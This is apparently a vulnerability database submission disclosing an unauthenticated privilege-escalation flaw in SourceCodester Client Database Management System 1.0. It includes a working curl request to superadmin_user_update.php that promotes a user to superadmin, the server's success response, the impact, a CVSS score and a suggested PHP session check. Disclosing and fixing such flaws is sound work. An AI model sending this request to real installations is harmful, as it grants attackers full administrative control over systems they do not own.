| Title | SourceCodester Client Database Management System (CDMS) 1.0 Improper Handling of Insufficient Privileges |
|---|
| Description | An unauthenticated attacker can send the following request:
curl -X POST http://127.0.0.1/cdm/superadmin_user_update.php \
-d "user_id=32" \
-d "firstname=Test" \
-d "lastname=User" \
-d "username=testuser" \
-d "role=superadmin" \
-d "department_assignment=IT" \
-d "id_number=ID999"
Server response:
{"status":"success","message":"User updated successfully!"}
Verification in database:
SELECT user_id, username, role FROM users WHERE user_id=32;
Result:
user_id | username | role
32 | testuser | superadmin
This confirms that privilege escalation is possible without authentication.
???? Impact
An attacker can:
Escalate privileges to superadmin
Modify or delete users
Delete managers
Manipulate system data
Gain full administrative control
This results in complete compromise of confidentiality, integrity, and availability.
???? CVSS v3.1 Vector
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Severity: Critical
???? Recommended Fix
Implement proper session validation and role-based access control:
Require authenticated session
Verify user role is superadmin
Reject unauthorized requests
Example:
include 'superadmin_session.php';
if ($_SESSION['role'] !== 'superadmin') {
exit('Unauthorized');
} |
|---|
| Source | ⚠️ https://gist.github.com/Adarshh-A/77dedc295e377e0492d15071e9bb2498 |
|---|
| User | Adarsh007 (UID 95657) |
|---|
| Submission | 02/26/2026 12:04 (2 months ago) |
|---|
| Moderation | 03/07/2026 21:45 (9 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 349742 [SourceCodester Client Database Management System 1.0 superadmin_user_update.php improper authorization] |
|---|
| Points | 20 |
|---|